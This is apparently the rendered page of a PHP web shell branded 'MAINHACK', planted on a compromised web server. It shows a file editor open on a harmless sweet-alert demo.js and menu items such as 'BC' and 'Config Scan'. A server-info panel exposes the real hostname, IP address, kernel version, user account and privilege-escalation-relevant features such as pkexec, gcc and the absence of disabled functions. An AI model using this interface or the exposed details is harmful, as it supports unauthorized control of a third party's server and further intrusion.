[
MAINHACK
]
Mail Test
BC
Config Scan
HOME
Create...
New File
New Folder
Viewing / Editing File: demo.js
// // Demo.js // only for preview purposes - remove it when starting your project // 'use strict'; $(document).ready(function() { $('[data-toggle="sweet-alert"]').on('click', function(){ var type = $(this).data('sweet-alert'); switch (type) { case 'basic': swal({ title: "Here's a message!", text: 'A few words about this sweet alert ...', buttonsStyling: false, confirmButtonClass: 'btn btn-primary' }) break; case 'info': swal({ title: 'Info', text: 'A few words about this sweet alert ...', type: 'info', buttonsStyling: false, confirmButtonClass: 'btn btn-info' }) break; case 'info': swal({ title: 'Info', text: 'A few words about this sweet alert ...', type: 'info', buttonsStyling: false, confirmButtonClass: 'btn btn-info' }) break; case 'success': swal({ title: 'Success', text: 'A few words about this sweet alert ...', type: 'success', buttonsStyling: false, confirmButtonClass: 'btn btn-success' }) break; case 'warning': swal({ title: 'Warning', text: 'A few words about this sweet alert ...', type: 'warning', buttonsStyling: false, confirmButtonClass: 'btn btn-warning' }) break; case 'question': swal({ title: 'Are you sure?', text: 'A few words about this sweet alert ...', type: 'question', buttonsStyling: false, confirmButtonClass: 'btn btn-dark' }) break; case 'confirm': swal({ title: 'Are you sure?', text: "You won't be able to revert this!", type: 'warning', showCancelButton: true, buttonsStyling: false, confirmButtonClass: 'btn btn-danger', confirmButtonText: 'Yes, delete it!', cancelButtonClass: 'btn btn-secondary' }).then(function(result) { if (result.value) { // Show confirmation swal({ title: 'Deleted!', text: 'Your file has been deleted.', type: 'success', buttonsStyling: false, confirmButtonClass: 'btn btn-primary' }); } }) break; case 'image': swal({ title: 'Sweet', text: "Modal with a custom image ...", imageUrl: '../../assets/img/prv/splash.png', buttonsStyling: false, confirmButtonClass: 'btn btn-primary', confirmButtonText: 'Super!' }); break; case 'timer': swal({ title: 'Auto close alert!', text: 'I will close in 2 seconds.', timer: 2000, showConfirmButton: false }); break; } }); });
Save Changes
Cancel / Back
Close ×
Server Info
Hostname: server1.winmanyltd.com
Server IP: 203.161.60.52
PHP Version: 8.3.27
Server Software: Apache
System: Linux server1.winmanyltd.com 4.18.0-553.22.1.el8_10.x86_64 #1 SMP Tue Sep 24 05:16:59 EDT 2024 x86_64
HDD Total: 117.98 GB
HDD Free: 59.72 GB
Domains on IP: N/A (Requires external lookup)
System Features
Safe Mode:
Off
disable_functions:
None
allow_url_fopen:
On
allow_url_include:
Off
magic_quotes_gpc:
Off
register_globals:
Off
open_basedir:
None
cURL:
Enabled
ZipArchive:
Enabled
MySQLi:
Enabled
PDO:
Enabled
wget:
Yes
curl (cmd):
Yes
perl:
Yes
python:
Yes (py3)
gcc:
Yes
pkexec:
Yes
git:
Yes
User Info
Username: eliosofonline
User ID (UID): 1002
Group ID (GID): 1003
Script Owner UID: 1002
Current Dir Owner: 1002